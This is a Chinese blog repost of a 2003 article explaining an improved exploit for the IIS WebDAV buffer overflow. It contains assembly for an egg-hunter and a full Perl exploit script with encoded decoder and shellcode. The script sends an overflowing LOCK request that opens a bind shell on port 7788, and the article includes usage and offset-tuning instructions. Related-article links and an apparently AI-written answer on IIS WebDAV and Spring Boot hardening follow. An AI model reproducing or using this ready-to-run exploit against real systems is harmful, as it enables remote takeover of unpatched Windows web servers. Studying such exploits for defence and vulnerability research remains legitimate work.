【分析】通用的攻击WebDAV漏洞的方法

最新推荐文章于 2024-06-25 04:12:03 发布
最新推荐文章于 2024-06-25 04:12:03 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: 溢出研究 文章标签: socket byte stream shell io c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/freexploit/article/details/333963
版权

通用的攻击WebDAV漏洞的方法


创建时间:2003-03-29
文章属性:原创
文章来源: http://www.xfocus.net
文章提交: isno (isno_at_sina.com)

by isno
    前几天写的WebDAV漏洞的分析和溢出程序,有一些网友对exploit程序的成功率提出了质疑,哈哈,那个程序确实写的不好,成功率是比较低的。这两天我又翻出yuange原来写的《widechar的字符串缓冲溢出攻击技术》文章仔细看了一下,发现WebDAV漏洞原来也可以用jmp ebx地址作为返回地址来利用的。用这种方法,我又写了一个exploit程序,果然成功率提高了一些。
    首先,我们使用一个符合UNICODE转换的含有jmp ebx或者call ebx指令的地址来覆盖异常处理指针,这样发生异常以后会返回到前面4个字节处执行。我们就在地址前放上两个可以执行的指令0x51(push ecx)0x59(pop xxxx),这样保证可以正常的跳过返回地址。然后在后面放上一段解码指令,可以直接解码后面的可显示字符。这是一段搜索内存的代码,从内存中搜索到真正的shellcode,然后就跳到真正的shellcode去执行。
    具体的方法可以参见袁哥以前写的文章:
     http://www.nsfocus.net/index.php?act=sec_self&do=view&doc_id=646
    搜索shellcode的代码如下:
       add esi, 1000h
       jmp loadmem
   lookupN:
       add esi, 4000h
   loadmem:
       mov eax, [esi]
       cmp eax, 4e4e4e4eh    ;搜索含NNNN的内存,提高搜索效率
       jnz lookupN
       add esi, 4
   lookupYXYX:
       mov al, byte ptr [esi]
       inc esi
       cmp al, 59h           ;在后面搜索YXYX,这是我们放在shellcode前面用来定位的
       jnz lookupYXYX
       mov al, byte ptr [esi]
       inc esi
       cmp al, 58h
       jnz lookupYXYX
       lodsw
       cmp ax, 0x5859
       jnz lookupYXYX
       jmp esi               ;搜索到以后就跳到shellcode去执行
    当然首先要把异常处理给接管了,这样搜索到不存在的页面的时候可以仍然跳回我们自己的程序去执行。
    修改以后的exploit程序如下:

-------------------------------------------------------------------
#!/usr/bin/perl
#use call ebx as the ret
#tested on CHINESE win2k sp2&sp3
#by isno@xfocus.org

use IO::Socket;
if ($#ARGV<1){die "webdavx.pl IP offset/r/noffset: 0-7/r/n";}
$host = @ARGV[0];
$port = 80;
$offset = @ARGV[1];

$decode =
"%u5390%u665e%u66ad%u993d%u7560%u56f8%u5656%u665f".
"%u66ad%u4e3d%u7400%u9023%u612c%u5090%u6659%u90ad".
"%u612c%u548d%u7088%u548d%u908a%u548d%u708a%u548d".
"%u908a%u5852%u74aa%u75d8%u90d6%u5058%u5050%u90c3".
"%u6099";
#decoder code
#66 bytes

$sc =
"ffilomidomfafd".
"fgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpainlnpeppppppgekbaaaaaaaaijehai".
"geijdnaaaaaaaamhefpeppppppppilefpaidoiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaol".
"agibmgaaeaaaaailagdneoeoeoeohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfjfihf".
"okppogolpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoihhppppppce".
"cecece";
#code to find the real shellcode
#340 byes

$num = 266+$offset;
$bf = "A" x $num;
$ret = "%u5951%u6858%u6772%u695c" x 8; #call ebx addr 0x695c6772
$n = 64842;
$buf = "N" x $n;
$tag = "YXYX";
$shell =
    "/x90/xeb/x03/x5d/xeb/x05/xe8/xf8/xff/xff/xff/x83/xc5/x15/x90/x90".
        "/x90/x8b/xc5/x33/xc9/x66/xb9/x10/x03/x50/x80/x30/x97/x40/xe2/xfa".
        "/x7e/x8e/x95/x97/x97/xcd/x1c/x4d/x14/x7c/x90/xfd/x68/xc4/xf3/x36".
        "/x97/x97/x97/x97/xc7/xf3/x1e/xb2/x97/x97/x97/x97/xa4/x4c/x2c/x97".
        "/x97/x77/xe0/x7f/x4b/x96/x97/x97/x16/x6c/x97/x97/x68/x28/x98/x14".
        "/x59/x96/x97/x97/x16/x54/x97/x97/x96/x97/xf1/x16/xac/xda/xcd/xe2".
        "/x70/xa4/x57/x1c/xd4/xab/x94/x54/xf1/x16/xaf/xc7/xd2/xe2/x4e/x14".
        "/x57/xef/x1c/xa7/x94/x64/x1c/xd9/x9b/x94/x5c/x16/xae/xdc/xd2/xc5".
        "/xd9/xe2/x52/x16/xee/x93/xd2/xdb/xa4/xa5/xe2/x2b/xa4/x68/x1c/xd1".
        "/xb7/x94/x54/x1c/x5c/x94/x9f/x16/xae/xd0/xf2/xe3/xc7/xe2/x9e/x16".
        "/xee/x93/xe5/xf8/xf4/xd6/xe3/x91/xd0/x14/x57/x93/x7c/x72/x94/x68".
        "/x94/x6c/x1c/xc1/xb3/x94/x6d/xa4/x45/xf1/x1c/x80/x1c/x6d/x1c/xd1".
        "/x87/xdf/x94/x6f/xa4/x5e/x1c/x58/x94/x5e/x94/x5e/x94/xd9/x8b/x94".
        "/x5c/x1c/xae/x94/x6c/x7e/xfe/x96/x97/x97/xc9/x10/x60/x1c/x40/xa4".
        "/x57/x60/x47/x1c/x5f/x65/x38/x1e/xa5/x1a/xd5/x9f/xc5/xc7/xc4/x68".
        "/x85/xcd/x1e/xd5/x93/x1a/xe5/x82/xc5/xc1/x68/xc5/x93/xcd/xa4/x57".
        "/x3b/x13/x57/xe2/x6e/xa4/x5e/x1d/x99/x13/x5e/xe3/x9e/xc5/xc1/xc4".
        "/x68/x85/xcd/x3c/x75/x7f/xd1/xc5/xc1/x68/xc5/x93/xcd/x1c/x4f/xa4".
        "/x57/x3b/x13/x57/xe2/x6e/xa4/x5e/x1d/x99/x17/x6e/x95/xe3/x9e/xc5".
        "/xc1/xc4/x68/x85/xcd/x3c/x75/x70/xa4/x57/xc7/xd7/xc7/xd7/xc7/x68".
        "/xc0/x7f/x04/xfd/x87/xc1/xc4/x68/xc0/x7b/xfd/x95/xc4/x68/xc0/x67".
        "/xa4/x57/xc0/xc7/x27/x9b/x3c/xcf/x3c/xd7/x3c/xc8/xdf/xc7/xc0/xc1".
        "/x3a/xc1/x68/xc0/x57/xdf/xc7/xc0/x3a/xc1/x3a/xc1/x68/xc0/x57/xdf".
        "/x27/xd3/x1e/x90/xc0/x68/xc0/x53/xa4/x57/x1c/xd1/x63/x1e/xd0/xab".
        "/x1e/xd0/xd7/x1c/x91/x1e/xd0/xaf/xa4/x57/xf1/x2f/x96/x96/x1e/xd0".
        "/xbb/xc0/xc0/xa4/x57/xc7/xc7/xc7/xd7/xc7/xdf/xc7/xc7/x3a/xc1/xa4".
        "/x57/xc7/x68/xc0/x5f/x68/xe1/x67/x68/xc0/x5b/x68/xe1/x6b/x68/xc0".
        "/x5b/xdf/xc7/xc7/xc4/x68/xc0/x63/x1c/x4f/xa4/x57/x23/x93/xc7/x56".
        "/x7f/x93/xc7/x68/xc0/x43/x1c/x67/xa4/x57/x1c/x5f/x22/x93/xc7/xc7".
        "/xc0/xc6/xc1/x68/xe0/x3f/x68/xc0/x47/x14/xa8/x96/xeb/xb5/xa4/x57".
        "/xc7/xc0/x68/xa0/xc1/x68/xe0/x3f/x68/xc0/x4b/x9c/x57/xe3/xb8/xa4".
        "/x57/xc7/x68/xa0/xc1/xc4/x68/xc0/x6f/xfd/xc7/x68/xc0/x77/x7c/x5f".
        "/xa4/x57/xc7/x23/x93/xc7/xc1/xc4/x68/xc0/x6b/xc0/xa4/x5e/xc6/xc7".
        "/xc1/x68/xe0/x3b/x68/xc0/x4f/xfd/xc7/x68/xc0/x77/x7c/x3d/xc7/x68".
        "/xc0/x73/x7c/x69/xcf/xc7/x1e/xd5/x65/x54/x1c/xd3/xb3/x9b/x92/x2f".
        "/x97/x97/x97/x50/x97/xef/xc1/xa3/x85/xa4/x57/x54/x7c/x7b/x7f/x75".
        "/x6a/x68/x68/x7f/x05/x69/x68/x68/xdc/xc1/x70/xe0/xb4/x17/x70/xe0".
        "/xdb/xf8/xf6/xf3/xdb/xfe/xf5/xe5/xf6/xe5/xee/xd6/x97/xdc/xd2/xc5".
        "/xd9/xd2/xdb/xa4/xa5/x97/xd4/xe5/xf2/xf6/xe3/xf2/xc7/xfe/xe7/xf2".
        "/x97/xd0/xf2/xe3/xc4/xe3/xf6/xe5/xe3/xe2/xe7/xde/xf9/xf1/xf8/xd6".
        "/x97/xd4/xe5/xf2/xf6/xe3/xf2/xc7/xe5/xf8/xf4/xf2/xe4/xe4/xd6/x97".
        "/xd4/xfb/xf8/xe4/xf2/xdf/xf6/xf9/xf3/xfb/xf2/x97/xc7/xf2/xf2/xfc".
        "/xd9/xf6/xfa/xf2/xf3/xc7/xfe/xe7/xf2/x97/xd0/xfb/xf8/xf5/xf6/xfb".
        "/xd6/xfb/xfb/xf8/xf4/x97/xc0/xe5/xfe/xe3/xf2/xd1/xfe/xfb/xf2/x97".
        "/xc5/xf2/xf6/xf3/xd1/xfe/xfb/xf2/x97/xc4/xfb/xf2/xf2/xe7/x97/xd2".
        "/xef/xfe/xe3/xc7/xe5/xf8/xf4/xf2/xe4/xe4/x97/x97/xc0/xc4/xd8/xd4".
        "/xdc/xa4/xa5/x97/xe4/xf8/xf4/xfc/xf2/xe3/x97/xf5/xfe/xf9/xf3/x97".
        "/xfb/xfe/xe4/xe3/xf2/xf9/x97/xf6/xf4/xf4/xf2/xe7/xe3/x97/xe4/xf2".
        "/xf9/xf3/x97/xe5/xf2/xf4/xe1/x97/x95/x97/x89/xfb/x97/x97/x97/x97".
        "/x97/x97/x97/x97/x97/x97/x97/x97/xf4/xfa/xf3/xb9/xf2/xef/xf2/x97".
        "/x68/x68/x68/x68";

$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type =>SOCK_STREAM) or die "Couldn't connect: @!/n";
print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1/r/n";
print $socket "Host: $host/r/n";
print $socket "Content-Type: text/xml/r/n";
print $socket "Content-length: 808/r/n/r/n";
print $socket "$tag$shell/r/n";


print "send buffer.../r/n";
print "telnet target 7788/r/n";
print "if fail, try other offset(0-7)/r/n";

#$socket->recv($buf,500);
#print $buf;

close($socket);
-------------------------------------------------------------------

    使用方法是:
    webdavx2.pl 192.168.0.1 0
    然后telnet 192.168.0.1 7788试试看。
    这里设了一个offset,因为发现有些机器取出的路径不太一样,有的是//?/C:/Inetpub/Gtmis0/asp/,而有的是//?/C:/Inetpub/wwwroot/,就是WWW的根目录。所以你从0试到7看看,如果还不行的话就试试-1,-2,-3......:)如果还没成功就算了。
Web中间件常见安全漏洞总结
qq_40907977的博客
08-14 6945
IIS IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。IIS目前只适用于Windows系统,不适用于其他操作系统。 解析漏洞 IIS 6.X 基于文件名 该版本 默认会将 *.asp;.jpg 此种格式的文件名,当成Asp解析,原理是 服务器默认不解析; 号及其后面的内容,相当于截断。 基于文件夹名 该版本 默认会将 *.asp/目录下的所有文件当成Asp解析。 另外,IIS6.
【实战】WebDav远程溢出漏洞分析
FreeXploiT
03-30 1593
WebDav远程溢出漏洞分析创建时间:2003-03-27文章属性:原创文章来源:http://www.xfocus.net文章提交:isno (isno_at_sina.com)WebDav远程溢出漏洞分析by isno@xfocus.org一、漏洞分析    这个漏洞可能是前些年就有牛人发现了的,不过一直没公布,直到最近微软出了安全公告大家才知道原来有这么个漏洞。虽然WebDav是通过IIS来
〖教程〗LadonExp使用IIS写权限Webdav漏洞复现
K8哥哥
08-16 682
LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。 漏洞成因 该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 IIS配置 1 启用webdav组件 2 目录给写权限(为了方便直接eveyone完全写入权限) 3 脚本资源访问权限(不然MOVE失败即无法GetShell) 漏洞复现 使用LadonEXP可轻松复现
IIS 6 惊现 WebDAV 漏洞攻击
COMSHARP CMS 专栏
05-19 1651
美国计算机紧急反应组近日透露,上周发现的 IIS6 WebDAV 漏洞已经被用在攻击中,这个由计算机安全专家 Nikolaos Rangos 发现的漏洞可以通过一个伪造的 HTTP 请求,查看并上传文件到 IIS6 服务器,攻击利用了微软处理 Unicode token 过程中的漏洞。 微软在一份声明中表示,尚未听说此类攻击的发生,但他们正在对此进行观察,并将提供安全顾问为用户提
【基础篇】————13、隐匿攻击WebDAV
Fly_鹏程万里
05-26 1225
WebDAV是用于Web内容创作操作的HTTP协议的扩展。该协议的一些优点可以在红色团队中使用,因为它是代理感知和隐秘的,因为连接到WebDAV服务器的请求看起来像是通过SvCHOST进程从操作系统本身来的。 PROPFIND方法用于检索存储在WebDAV服务器中的资源的属性。这些属性可以包括文件名,内容长度,创建和修改日期等。 Arno0x0x发现可以通过PROPFIND响应传递有效负载,方...
WebDav服务器漏洞利用
奇葩
12-06 3266
参考链接:https://charlesreid1.com/wiki/Metasploitable/Apache/DAV 生成php后门 将php后门,通过dav上传到服务器中 服务器中就多了一个文件 使用msf 点击web的文件,使得反射payload生效 入侵靶机成功 ...
WebDav漏洞简单分析通用exploit设计
FreeXploiT
10-29 2303
WebDav漏洞简单分析通用exploit设计    拜读了isno写的>、>,以及Nankia写的>之后,用他们发布的exploit、以及能在网上找到的exploit在我的一些测试机上测试,有些成功,有些不成功。于是便想自己调试一下。在后来的调试过程中,参考了大量资料,特别是yuange所写的>。在这过程中我学到了很多东西,自己也有些心得体会,其中可能有不少错误的地方,于是便想写下来,一来请各
【实战】WebDav漏洞简单分析通用exploit设计
FreeXploiT
03-30 1995
WebDav漏洞简单分析通用exploit设计创建时间:2003-05-09文章属性:原创文章提交:eyas (ey4s_at_21cn.com)WebDav漏洞简单分析通用exploit设计ey4s2003-04-25    拜读了isno写的>、>,以及Nankia写的>之后,用他们发布的exploit、以及能在网上找到的exploit在我的一些测试机上测试,有些成功,有些不成功。于是便想
Web中间件常见安全漏洞总结_web中间件常见漏洞总结
06-25 1348
4.打开IIS,管理工具 ->Internet 信息服务(IIS)管理器5.选择编辑ISAPI或者CGI限制添加安装的php-cgi.exe路径,描述随意6.返回第五步的第一个图片位置,点击处理程序映射,添加如下。7.phpinfo测试IIS7.x版本 在Fast-CGI运行模式下,在任意文件,例:test.jpg后面加上/.php,会将test.jpg 解析为php文件。配置cgi.fix_pathinfo(php.ini中)为0并重启php-cgi程序。
渗透测试漏洞大全
2301_76786857的博客
06-13 1576
由于开发人员编写源码,开放着将可重复使用的代码插入到单个的文件中,并在需要的时候将它们包含在特殊的功能代码文件中,然后包含文件中的代码会被解释执行。应用需要对输入进行检查,不允许用户直接提交未经过验证的数据到服务器,因为这些数据来不可编辑的控件,或者用户没有前端提交的权限,任何可编辑控件必须有阻止恶意的写入或修改的功能。网站登录失败、账号注册、密码找回等功能,有些网站会提示类似“用户名不存在”的错误,攻击者可以通过该提示先猜测出系统存在哪些账号,然后再进一步猜测密码,降低了暴力破解的成本。
MQtt_WPF服务演示代码
01-15
MQtt_WPF服务演示代码,一个全托管的云服务,帮助建立设备与云端之间安全可靠的双向连接,以支撑海量设备的数据收集、监控、故障预测等各种物联网场景
WebDav远程溢出漏洞分析
CC's Blog
09-06 3901
文章来源:http://www.xfocus.net WebDav远程溢出漏洞分析 by isno@xfocus.org 一、漏洞分析     这个漏洞可能是前些年就有牛人发现了的,不过一直没公布,直到最近微软出了安全公告大家才知道原来有这么个漏洞。虽然WebDav是通过IIS来利用这个漏洞的,但是漏洞本身并不是IIS造成的,而是ntdll.dll里面的一个API函
python创建一个目录_生成一个运行sDist的目录并创建一个空的sDist包
weixin_30019895的博客
12-24 689
创建了一个安装文件。用下面的代码设置.py是import sysfrom distutils.core import setupsetup(name='SomePackage',author='dave',version='0.1.0',author_email='dave',packages=['apples',],license='LICENSE.txt',url="None",include...
Web漏洞分析-文件解析及上传(中)
qq_61861243的博客
12-13 165
当php遇到文件路径“/aaa.xxx/bbb.yyy/ccc.zzz”时,若“/aaa.xxxbbb.yyy/ccc.zzz”不存在,则会去掉最后的“/ccc.zzz”,然后判断“aaa.xxx/bbb.yyy”是否存在,若存在,则把“/aaa.xxx/bbb.yyy”当做文件“/aaa.xxx/bbb.yyy/ccc.zzz”,若“/aaa.xxx/bbb.yyy”仍不存在,则继续去掉“/bbb.yyy”,以此类推。①、将php.ini文件中的cgi.fix_pathinfo的值设为0。
rclone挂载webdav详细步骤(含脚本)
阳宗德的博客
02-04 8653
将生成的快捷方式复制/剪切到以下文件夹C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup。windows\rclone-v1.57.0\start_config.bat : 配置服务器地址脚本。步骤1: 进入文件夹windows双加winfsp-1.12.22301.msi ,然后一直下一步。windows\rclone-v1.57.0\start_mount.bat : 挂载脚本。:初次使用时,执行该步骤。
windows挂载webdav
weixin_38140494的博客
08-27 7835
刚才已经创建好了webdav的驱动器,现在需要把它挂载到电脑上面,命令很简单,但是要注意将橙色文字替换成你自己的。输入webdav服务器的地址和端口,我的是:http://192.168.1.200:8080。你可以吧上面的命令放到记事本,保存后修改为rclone.bat,放到rclone文件夹中。选择挂载驱动器的类型,上下滚动找到我们需要的webdav,输入对应的数字45。下载rclone和winfsp两个软件,下载地址---百度,这时如果配置正确就能看到你的webdav的名字,输入q退出。...
WebDAV服务漏洞利用工具DAVTest
weixin_33825683的博客
07-27 990
2019独角兽企业重金招聘Python工程师标准>>> ...
常见36种web渗透测试漏洞描述及解决方法
weixin_44600998的博客
03-15 3353
36种web渗透测试漏洞描述及解决方法
IIS WebDAV PUT spring boot
最新发布
03-14
<think>嗯,用户问的是关于IIS WebDAV PUT和Spring Boot的内容。首先,我需要理解这两个部分各自的作用以及它们之间的关系。 首先,IIS的WebDAV扩展允许通过HTTP方法如PUT上传文件,PUT方法常用于上传资源到指定位置。但可能存在安全风险,比如文件上传漏洞攻击者可能利用PUT方法上传恶意文件。 然后是Spring Boot,作为Java框架,常用于构建Web应用。用户可能想知道如何在Spring Boot中处理文件上传,或者如何防范通过WebDAV PUT带来的安全威胁。 接下来,用户可能的实际需求是什么?可能是想了解如何配置IIS的WebDAV,或者如何在Spring Boot应用中安全地处理文件上传,或者两者之间的集成或安全问题。 需要分步骤解释:首先介绍IIS WebDAV PUT的作用和潜在风险,再讲Spring Boot如何处理文件上传,最后可能涉及如何结合两者或防范攻击。 另外,用户可能是在实际开发中遇到了相关问题,比如在IIS服务器上部署Spring Boot应用,然后遇到文件上传的安全问题,或者想了解如何安全地实现类似功能。 需要确保回答结构清晰,先讲IIS部分,再讲Spring Boot部分,然后可能的安全建议。同时注意使用正确的LaTeX格式,比如数学表达式用$...$,独立公式用$$...$$,但根据问题内容可能数学公式不多,但如果有示例代码或配置,需要适当格式化。 还要检查是否有技术细节错误,比如IIS中禁用WebDAV方法,Spring Boot的文件上传配置,安全措施如文件类型检查、大小限制、重命名等。 最后,确保用中文,口语化,但避免使用Markdown,分步骤说明,帮助用户逐步理解。</think>以下分步骤介绍IIS WebDAV PUT与Spring Boot的关系及注意事项: $\boxed{步骤1:理解IIS WebDAV PUT的作用}$ - IIS的WebDAV扩展允许通过HTTP方法(如PUT)进行文件管理 - PUT方法用于上传文件到服务器指定路径,例如: ```http PUT /uploads/test.txt HTTP/1.1 Host: example.com Content-Type: text/plain [文件内容] ``` - $\textcolor{red}{安全隐患}$:未正确配置时可能允许任意文件上传,导致服务器被入侵 $\boxed{步骤2:Spring Boot的文件处理机制}$ - Spring Boot通过MultipartFile处理文件上传: ```java @PostMapping("/upload") public String upload(@RequestParam("file") MultipartFile file) { String fileName = file.getOriginalFilename(); file.transferTo(new File("/safe/path/" + fileName)); return "上传成功"; } ``` - $\textcolor{blue}{与WebDAV的区别}$:Spring Boot默认不启用WebDAV协议,需显式实现文件操作 $\boxed{步骤3:安全防护措施}$ 1. IIS端防护: ```xml <!-- 禁用WebDAV(web.config配置) --> <system.webServer> <modules> <remove name="WebDAVModule" /> </modules> </system.webServer> ``` 2. Spring Boot端防护: ```properties # 限制上传文件大小 spring.servlet.multipart.max-file-size=10MB spring.servlet.multipart.max-request-size=10MB ``` 3. 通用防护策略: - 文件类型白名单验证 - 随机化存储文件名 - 设置文件存储目录不可执行 $\boxed{步骤4:典型应用场景}$ 当Spring Boot部署在IIS服务器时(通过反向代理): 1. 建议在IIS禁用WebDAV模块 2. 使用Spring Security加强权限控制 3. 通过Spring Boot的标准API实现安全文件上传 $$注意:实际部署时应遵循最小权限原则,定期进行安全审计$$
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值